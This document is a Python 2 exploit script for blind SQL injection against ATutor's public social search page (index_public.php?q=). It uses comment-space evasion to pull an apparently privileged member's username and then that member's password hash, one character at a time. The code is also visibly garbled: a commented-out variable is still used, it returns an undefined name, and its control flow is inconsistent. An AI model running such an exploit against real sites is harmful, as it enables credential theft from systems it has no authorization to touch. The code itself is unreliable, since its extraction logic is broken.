def inject(r, inj, ip): extracted = "" for i in range(1, r):

1. def inject(r, inj, ip):
2. extracted = ""
3. for i in range(1, r):
4. injection_string = "test'/**/or/**/(ascii(substring((%s),%d,1)))=[CHAR]/**/or/**/1='" % (inj.replace("[CHAR]", str(i)),i)
5. #retrieved_value = searchFriends_sqli(ip, injection_string)
6. for j in range(32, 126):
7. # now we update the sqli
8. target = "http://%s/ATutor/mods/_standard/social/index_public.php?q=%s" % (ip, injection_string.replace("[CHAR]", str(j)))
9. r = requests.get(target)
10. print r.headers
11. content_length = int(r.headers['Content-Length'])
12. if (content_length > 20):
13. return j
14. if(retrieved_value):
15. extracted += chr(retrieved_value)
16. extracted_char = chr(retrieved_value)
17. sys.stdout.write(extracted_char)
18. sys.stdout.flush()
19. else:
20. print "\n(+) done!"
21. break
22. else:
23. return None
24. return z
25.  
26. def main():
27. if len(sys.argv) != 2:
28. print "(+) usage: %s <target>" % sys.argv[0]
29. print '(+) eg: %s 192.168.121.103' % sys.argv[0]
30. sys.exit(-1)
31.  
32. ip = sys.argv[1]
33. print "(+) Retrieving username...."
34. query = 'select/**/login/**/from/**/AT_members/**/where/**/status=3/**/limit/**/1'
35. username = inject(50, query, ip)
36. print "(+) Retrieving password hash...."
37. query = 'select/**/password/**/from/**/AT_members/**/where/**/login/**/=/**/\'%s\'' % (username)
38. password = inject(50, query, ip)
39. print "(+) Credentials: %s / %s" % (username, password)
40.  
41.  
42. if __name__ == "__main__":
43. main()